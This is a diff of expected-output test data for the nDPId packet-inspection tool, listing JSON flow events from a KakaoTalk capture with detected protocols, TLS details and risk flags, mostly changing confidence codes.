00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2857,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1430069211703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChoA0AAQAZvfAoYUryt\/FiA6jIBuzJ1sXljz56FUBA2sGNrAAA="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2858,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069211639,"flow_last_seen":1430069211712,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211712,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2858,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069211639,"flow_last_seen":1430069211712,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211712,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069211843,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":118,"pkt_l4_len":82,"thread_ts_msec":1430069211843,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGYfywAANRH9Kwq8AQEKGFK8ADVihwBSfKJimIGAAAEAAgAAAAAEbXF0dAhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAABNAACwRtcXR0A3Z2dsARwC8AAQABAAAAAQAErfxhAg=="} 
-00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211843,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.252.97.2"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2893,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069211639,"flow_last_seen":1430069212207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1430069212207,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"07dddc59e60135c7b479d39c3ae686af","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} 
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211843,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.252.97.2"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2893,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069211639,"flow_last_seen":1430069212207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1430069212207,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"07dddc59e60135c7b479d39c3ae686af","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} 
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1430069211639,"flow_last_seen":1430069213599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2372,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069211639,"flow_last_seen":1430069213599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2372,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
@@ -96,20 +96,20 @@ 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1488,"flow_first_seen":1430069171389,"flow_last_seen":1430069216410,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":133038,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170975,"flow_last_seen":1430069216076,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} 
-00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1430069159456,"flow_last_seen":1430069163250,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1488,"flow_first_seen":1430069171389,"flow_last_seen":1430069216410,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":133038,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170975,"flow_last_seen":1430069216076,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1430069159456,"flow_last_seen":1430069163250,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01155{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1430069163715,"flow_last_seen":1430069216555,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7008,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
-00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01155{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1430069163715,"flow_last_seen":1430069216555,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7008,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-01155{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1430069164966,"flow_last_seen":1430069216555,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7778,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +01155{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1430069164966,"flow_last_seen":1430069216555,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7778,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": 
{"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 